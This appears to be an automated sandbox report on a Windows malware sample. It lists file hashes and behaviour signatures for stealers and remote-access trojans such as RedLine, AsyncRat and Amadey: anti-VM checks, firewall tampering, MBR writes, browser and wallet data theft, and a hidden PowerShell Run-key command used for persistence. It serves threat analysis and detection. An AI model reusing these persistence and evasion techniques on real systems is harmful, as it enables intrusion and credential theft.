C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/708-353-0x00000000006B0000-0x00000000008F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1ac52e2503cc26baee4322f02f5b8d9c |
| SHA1 | 38e0cee911f5f2a24888a64780ffdf6fa72207c8 |
| SHA256 | f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4 |
| SHA512 | 7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834 |
memory/708-365-0x0000000006600000-0x000000000681E000-memory.dmp
memory/708-359-0x00000000052B0000-0x00000000054CC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3778f5e54565bbe9abc42dce76cbe2f6 |
| SHA1 | ded83f1b2b0187a718611e45b46a27f58a27ce11 |
| SHA256 | 036af4ec5f33e6649074f28541fefb6b85cd01e303995765d00f08f4bcd319ec |
| SHA512 | c4a4200d58d3f730c8e17e6c0a6bf8ff902cb4f4ec7c6557fb7114aefb96c07567cba13b036831799764ea139ec80df264d0e34b3fd0d00a9e570fb6afd984d7 |
memory/708-366-0x0000000006DD0000-0x0000000007374000-memory.dmp
memory/708-367-0x0000000006920000-0x00000000069B2000-memory.dmp
memory/708-381-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-385-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-396-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-407-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-404-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-401-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-399-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-393-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-405-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-391-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-389-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-398-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-383-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-387-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-380-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-375-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-372-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-368-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-377-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-373-0x0000000006600000-0x0000000006818000-memory.dmp
memory/708-370-0x0000000006600000-0x0000000006818000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 80d2f84ce53d22f983d082b8a7474ed0 |
| SHA1 | 0d40e6f2cfd40a6b44600dffe956af979777e872 |
| SHA256 | dbb21de051ba6af9649ba726b7ca012843a51964cf4c735768c0131f29f147d4 |
| SHA512 | 8d81de32252b7b503726646307b6fa2fe0e77d048d1bc8b2b02859a217d0aa3befe7f56ed748ea0e622a7f0a16dc5c514550e766b39cb652adcf950d483eab64 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b545cfe392ebb47b919b44160e57e062 |
| SHA1 | 6095cb373488e228b8508e449aeb63b0179d45d0 |
| SHA256 | 20917efe500abc3aac50afe5be1968f9f2f03736ea4f587dc43436fae4e5d473 |
| SHA512 | 52a082259c34dc7aae7ef67c075d37d1c1cfb5669e373a4e1db543cec125a0b61b12dbded5311bbc23e6d87d8db81435dbc353009a05df3146d7997f81040d4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
memory/708-5329-0x0000000006AA0000-0x0000000006AEC000-memory.dmp
memory/708-5328-0x0000000006A40000-0x0000000006A98000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e19edf928c2ba3559a6d530203ce91db |
| SHA1 | 2422e3e766c48b91a54b8c185203bf0a79f65614 |
| SHA256 | cbd004bd090e0758a4e0fb8a876d53348b1b4cbcf0ed78b526f55a3835b2359b |
| SHA512 | c5e47f57c72d70fdc32bd8b376153fee78068fdd40bb74939c2458182e8e2058282745b58ca2807640706f792cce20245c04f870f1cab506c37d35516971f994 |
memory/3964-5366-0x0000000000C80000-0x0000000001153000-memory.dmp
memory/1572-5367-0x00000000005B0000-0x0000000000A58000-memory.dmp
memory/1572-5369-0x00000000005B0000-0x0000000000A58000-memory.dmp
memory/3964-5371-0x0000000000C80000-0x0000000001153000-memory.dmp
memory/708-5387-0x0000000006C40000-0x0000000006C94000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | f5eafc92b2c2c85caf2ead6667131302 |
| SHA1 | d5d7c4fb68feab8f6efb7539821353cc038525c0 |
| SHA256 | 564a788b7259baa3827bfc444468c03c30e967a515c55d78a300c344d8f7c24b |
| SHA512 | f6af62924b293fa485ad1e304a6762bd98e7ff5f29a14f1b6059149db0b9ad4093384fd4c21e5fa7ff7e21c2e198dd806d28da86cd49e4483044e15abc1ab308 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-31 22:27
Reported
2024-05-31 22:29
Platform
win11-20240508-en
Max time kernel
140s
Max time network
154s
Command Line
Signatures
Amadey
AsyncRat
Exela Stealer
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2612 created 3304 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif | C:\Windows\Explorer.EXE |
| PID 2612 created 3304 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif | C:\Windows\Explorer.EXE |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\6b4e5c58ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\6b4e5c58ea.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1000043001\\volumeinfo.exe'\"" | C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| N/A | N/A | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\1000004002\7ec52fcc46.exe | N/A |
| File created | C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\ucrVpivlTlXwlAC.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
